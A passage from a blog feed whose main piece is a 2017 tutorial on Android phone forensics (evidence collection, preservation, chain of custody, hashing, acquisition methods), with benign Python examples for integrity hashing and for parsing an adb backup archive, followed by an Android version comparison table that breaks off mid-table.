Well, naturally I’ll say Defender first and foremost, but of course there are a range of other security tools you can use. For example, we use <a href="https://www.cloudflare.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Cloudflare</a> extensively, especially on our education products, and there are a wide range of other WAF and SSL providers, such as the absolutely awesome <a href="https://letsencrypt.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Let’s Encrypt</a>.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<a href="http://opentechnation.blogspot.com/" target="_blank">Please visit here for more guides</a></div>
</div>
Anonymous http://www.blogger.com/profile/14161834164641471363 noreply@blogger.com
tag:blogger.com,1999:blog-185877282583432766.post-5731692250209155368
Published 2017-07-24T02:06:00.000+05:30, updated 2017-07-24T02:06:10.563+05:30
Practical Android Phone Forensics<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
Introduction</h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads//072117_1317_PracticalAn11-1024x0-c-default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads//072117_1317_PracticalAn11-1024x0-c-default.png" data-original-height="456" data-original-width="800" height="182" width="320" /></a></div>
Today’s world is the Android world. Almost 90% of devices run Android,
and each of us uses Android in one way or another. Many kinds of devices
run Android, but it is most widely used on smartphones: Android’s share
of the global smartphone market is 88%. It is therefore necessary that
investigators know the techniques and methods used for extracting data
from Android devices.<br />
<h1>
Overview of Mobile Forensic Process</h1>
Mobile forensics is a branch of digital forensics focused on mobile
devices, a field that is growing very fast. With the exponential growth
of the mobile market, the importance of mobile forensics has increased as
well. A mobile phone generally belongs to a single person, so analysing
it can reveal a great deal of personal information.<br />
This rapid growth also brings challenges. New models are designed and
launched at a very high rate, which makes it difficult to follow the same
procedure every time. Each case or investigation involving a new model
must be considered on its own and may require steps that are unique to
that case. Despite these challenges, syncing a mobile phone to a computer
with software makes extraction straightforward: one can pull data such as
SMS, contacts, installed applications, GPS data, emails and deleted data.<br />
As per Carrier’s definition (2006), digital evidence is data that
supports or refutes a hypothesis about digital events. Digital evidence
must be collected, preserved and analysed in a forensically sound manner
if it is to be presented in court. Preserving a mobile device without
altering its data is nearly impossible, because the device constantly
transmits data over the cellular network, Wi-Fi or Bluetooth. That is why
every small detail of the steps taken, from seizure through collection,
preservation and analysis to presentation in court, must be documented.<br />
<h2>
2.1 Collection</h2>
The steps below are recommended during collection of a mobile device:<br />
<ul>
<li>Note the location where the mobile device was collected. It is good
practice to photograph the location and the phone before taking any
further action.</li>
<li>Note the status of the device: whether it is powered on or off. If it
is powered on, check the battery status and network status, and check
whether the screen is locked.</li>
<li>Search for the SIM packaging and any cables located nearby.</li>
</ul>
<h2>
2.2 Preservation</h2>
Preservation of evidence is a crucial step in digital forensics. It is
very important to maintain evidence integrity throughout the
investigation. For mobile forensics, the steps below are good practice:<br />
<ul>
<li>An attacker could remotely wipe the data, or new activity could
overwrite existing data, so the first step should be to isolate the
mobile device from the network.</li>
<li>Several methods are available depending on the scenario: the forensic
investigator can remove the SIM card, switch the device to airplane mode,
or use a Faraday bag or a jammer.</li>
<li>Chain of Custody – the chain of custody is the document that records
the handling of the digital evidence from collection to presentation. It
includes details such as serial number, case number, locker number, the
investigator’s name, the date and time of each step, and details of
evidence transportation. It is crucial because it keeps track of the
digital evidence.</li>
<li>Hashing – hashing is the method used to prove the integrity of the
evidence. MD5 and SHA are the widely used algorithms for calculating hash
values of the evidence. As mentioned earlier, it is almost impossible to
interact with a mobile device without altering it, but we can calculate
the hash value of the data extracted through logical extraction, or of
the image file produced by physical extraction.</li>
</ul>
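The hashing and chain-of-custody steps above, worked through in code. This is an added example, not part of the original article: it streams an extracted image through MD5 and SHA-256 in one pass, writes a custody record with the hashes, re-verifies the file later, and shows that a single altered byte is detected. The image bytes, case number and investigator name are constructed placeholders.<br />

```python
"""Integrity hashing plus a chain-of-custody log for an extracted image.
Added example: the image, case number and investigator are constructed."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

# MD5 is kept for compatibility with older tool reports; SHA-256 is the primary value.
ALGORITHMS = ("md5", "sha256")


def hash_bytes(data, algorithms=ALGORITHMS):
    """Hash an in-memory buffer with each algorithm; returns {name: hex digest}."""
    return {name: hashlib.new(name, data).hexdigest() for name in algorithms}


def hash_file(path, algorithms=ALGORITHMS, chunk_size=1 << 20):
    """Stream a (possibly multi-GB) image through every hash in a single pass."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def custody_entry(path, case_no, investigator, action, hashes):
    """One chain-of-custody record: who did what to which artefact, when, with its hashes."""
    return {
        "case_no": case_no,
        "artefact": os.path.basename(path),
        "size_bytes": os.path.getsize(path),
        "action": action,
        "investigator": investigator,
        "timestamp_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "hashes": hashes,
    }


def verify_file(path, expected):
    """Recompute the recorded hashes and compare; any mismatch means the artefact changed."""
    return hash_file(path, tuple(expected.keys())) == expected


def demo():
    """Acquire -> hash -> log -> verify, then show that a one-byte change is caught.
    Returns (intact_before_change, intact_after_change)."""
    # Constructed stand-in for a 16 KiB logical-extraction image.
    image = bytes(range(256)) * 64
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "userdata_logical.img")
        with open(path, "wb") as fh:
            fh.write(image)

        hashes = hash_file(path)
        log = [custody_entry(path, "CASE-0001", "A. Investigator", "acquired", hashes)]
        intact = verify_file(path, hashes)

        # Simulate an alteration of a single byte (e.g. a tool writing into the image).
        with open(path, "r+b") as fh:
            fh.seek(100)
            fh.write(b"\x00")
        tampered = verify_file(path, hashes)
        log.append(custody_entry(path, "CASE-0001", "A. Investigator",
                                 "verification", hash_file(path)))
        print(json.dumps(log, indent=2))
        return intact, tampered


if __name__ == "__main__":
    demo()
```

Record the hashes at acquisition time and again whenever the artefact changes hands; a mismatch at any later step tells you exactly which custody interval to question.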
<h2>
2.3 Acquisition</h2>
There are three methods used for extracting data from Android devices; an overview of each is given below.<br />
<ul>
<li>Physical – a bit-for-bit copy of the device’s storage, which allows
recovery of deleted data. Unfortunately, in mobile forensics this method
is not always possible.</li>
<li>File system – this method extracts the files that are visible at the file system level.</li>
<li>Logical – this method extracts particular files from the file system, in the manner of a backup.</li>
<li>Sometimes offensive techniques such as password cracking and rooting need to be performed.</li>
</ul>
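A concrete instance of logical extraction "like a backup" is the archive produced by <code>adb backup</code>, a .ab file. The following added example (not code from the article) parses that format: a four-line text header (magic, version, compression flag, encryption mode) followed by a tar stream, zlib-compressed when the flag is set. The sample archive, package name and file contents are constructed in memory; the parser only reads unencrypted archives and reports encrypted ones without decrypting them.<br />

```python
"""Parsing an 'adb backup' (.ab) archive as an example of logical extraction.
Added example: the backup blob, package name and file contents are constructed."""
import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP"


def build_sample_backup(files, compressed=True, encryption=b"none", version=5):
    """Assemble a .ab blob: 4-line header, then a (zlib-compressed) tar stream.
    Used here only to construct test input; a real archive comes from the device."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    payload = buf.getvalue()
    if compressed:
        payload = zlib.compress(payload)
    header = b"\n".join([MAGIC, str(version).encode(), b"1" if compressed else b"0", encryption]) + b"\n"
    return header + payload


def parse_backup(blob):
    """Split the header from the payload.
    Returns (metadata, tar_bytes); tar_bytes is None for encrypted archives, whose
    extra key-derivation header lines and AES payload are not handled here."""
    parts = blob.split(b"\n", 4)
    if len(parts) != 5 or parts[0] != MAGIC:
        raise ValueError("not an adb backup archive")
    meta = {
        "version": int(parts[1]),
        "compressed": parts[2] == b"1",
        "encryption": parts[3].decode("ascii"),
    }
    if meta["encryption"] != "none":
        return meta, None
    payload = parts[4]
    if meta["compressed"]:
        payload = zlib.decompress(payload)
    return meta, payload


def list_entries(tar_bytes):
    """Return (path, size) for every regular file in the tar stream."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        return [(m.name, m.size) for m in tar.getmembers() if m.isfile()]


def read_entry(tar_bytes, name):
    """Pull one file's bytes out of the tar stream without writing to disk."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        return tar.extractfile(name).read()


# Constructed entries laid out the way adb backup stores them: apps/<package>/<domain>/<file>
SAMPLE_FILES = {
    "apps/com.example.notes/_manifest": b"com.example.notes\n",
    "apps/com.example.notes/db/notes.db": b"SQLite format 3\x00" + bytes(64),
    "apps/com.example.notes/sp/com.example.notes_preferences.xml":
        b'<map><string name="user">alice</string></map>',
}


def demo():
    """Build a sample archive, parse it and list what a logical extraction yields."""
    meta, tar_bytes = parse_backup(build_sample_backup(SAMPLE_FILES))
    entries = list_entries(tar_bytes)
    print(meta)
    for name, size in entries:
        print(f"{size:6d}  {name}")
    return meta, entries


if __name__ == "__main__":
    demo()
```

Hash the .ab file before parsing it (see the hashing step above) and work from the in-memory copy, so the artefact on disk is never touched during analysis. The SQLite databases under <code>db/</code> are where most application data of interest lives.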
<h1>
Android OS Comparison</h1>
The table below lists the various Android versions and compares the important features added in each new version:<br />
<div>
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 127px;"></col>
<col style="width: 175px;"></col>
<col style="width: 278px;"></col>
<col style="width: 293px;"></col>
<col style="width: 158px;"></col>
<col style="width: 98px;"></col></colgroup>
<tbody valign="top">
<tr style="background: black; height: 96px;">
<td style="border-bottom: solid black 0.5pt; border-left: solid black 0.5pt; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Version number</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Version name</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Key user features added</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Key developer features added</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Release date</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: solid black 0.5pt; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>API Level</strong></span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-7-1-1" target="_top"><span style="font-size: 10pt;"><strong>Android 7.1.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nougat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Long press on the app icon enables new launch actions</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2016 Dec 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">25</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-7-1" target="_top"><span style="font-size: 10pt;"><strong>Android 7.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nougat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Storage manager improvements<br />
</span>
<span style="font-size: 10pt;">Option to enable fingerprint swipe down gesture<br />
</span><br />
<span style="font-size: 10pt;">Seamless system updates</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Shortcut manager APIs<br />
</span>
<span style="font-size: 10pt;">Keyboard image insertion<br />
</span><br />
<span style="font-size: 10pt;">Multi-endpoint call support<br />
</span><br />
<span style="font-size: 10pt;">Source type support for Visual Voicemail<br />
</span><br />
<span style="font-size: 10pt;">Carrier config options to manage video telephony</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2016 Oct 4</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">25</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-7" target="_top"><span style="font-size: 10pt;"><strong>Android 7.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nougat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Unicode 9.0<br />
</span>
<span style="font-size: 10pt;">Multi-window mode (PIP, Freeform window)<br />
</span><br />
<span style="font-size: 10pt;">Seamless system updates (with dual system partition)<br />
</span><br />
<span style="font-size: 10pt;">Compiler with better performance and smaller code size</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Sustained Performance Mode (SPM) API<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2016 Aug 22</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">24</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/andriod-6-marshmallow" target="_top"><span style="font-size: 10pt;"><strong>Android 6</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Marshmallow</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">USB Type-C support<br />
</span>
<span style="font-size: 10pt;">Fingerprint Authentication support<br />
</span><br />
<span style="font-size: 10pt;">Better battery life with “deep sleep.”<br />
</span><br />
<span style="font-size: 10pt;">Permissions dashboard<br />
</span><br />
<span style="font-size: 10pt;">Android Pay<br />
</span><br />
<span style="font-size: 10pt;">MIDI support</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">App Permissions management update</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2015 Oct 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">23</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-1" target="_top"><span style="font-size: 10pt;"><strong>Android 5.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Multiple SIM cards support<br />
</span>
<span style="font-size: 10pt;">Quick settings shortcuts to join Wi-Fi networks or control Bluetooth devices<br />
</span><br />
<span style="font-size: 10pt;">Lock protection if lost or stolen<br />
</span><br />
<span style="font-size: 10pt;">Stability and performance enhancements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2015 Mar 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">22</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-0-2" target="_top"><span style="font-size: 10pt;"><strong>Android 5.0.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Performance improvements and bug fixes</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Dec 19</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">21</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-0-1" target="_top"><span style="font-size: 10pt;"><strong>Android 5.0.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bug fixes for video playback issues and password failures</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Dec 2</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">21</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-lollipop" target="_top"><span style="font-size: 10pt;"><strong>Android 5.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">New design (Material design)<br />
</span>
<span style="font-size: 10pt;">Speed improvement</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Several new APIs<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Oct 17</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">21</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-4" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4.4</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fix Heartbleed / OpenSSL vulnerability</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Jun 23</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bug fixes<br />
</span>
<span style="font-size: 10pt;">Security enhancements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Dec 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bug fixes<br />
</span>
<span style="font-size: 10pt;">Enhance the camera and security feature on Nexus 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Dec 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-kitkat" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Screen recording<br />
</span>
<span style="font-size: 10pt;">Enhanced notification access<br />
</span><br />
<span style="font-size: 10pt;">System-wide settings for closed captioning<br />
</span><br />
<span style="font-size: 10pt;">Performance improvements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Public API for SMS management.<br />
</span>
<span style="font-size: 10pt;">Improved memory usage<br />
</span><br />
<span style="font-size: 10pt;">Security enhancements (SELinux enforcing mode, new cryptographic algorithms, VPN per user…)<br />
</span><br />
<span style="font-size: 10pt;">NFC Host Card Emulation (for wireless payment, loyalty programs…)<br />
</span><br />
<span style="font-size: 10pt;">Printing Framework<br />
</span><br />
<span style="font-size: 10pt;">Storage Access Framework<br />
</span><br />
<span style="font-size: 10pt;">Hardware Sensor Batching<br />
</span><br />
<span style="font-size: 10pt;">GLES2.0 SurfaceFlinger<br />
</span><br />
<span style="font-size: 10pt;">Chromium WebView<br />
</span><br />
<span style="font-size: 10pt;">Audio monitoring<br />
</span><br />
<span style="font-size: 10pt;">Wi-Fi certified Miracast<br />
</span><br />
<span style="font-size: 10pt;">New Bluetooth profile<br />
</span><br />
<span style="font-size: 10pt;">IR Blasters API<br />
</span><br />
<span style="font-size: 10pt;">Wi-Fi Tunneled Direct Link Setup (TDLS) support<br />
</span><br />
<span style="font-size: 10pt;">Tools for analyzing memory use (procstats, on-device memory status, and profiling)</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Oct 31</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-3" target="_top"><span style="font-size: 10pt;"><strong>Android 4.3</strong></span></a></td>
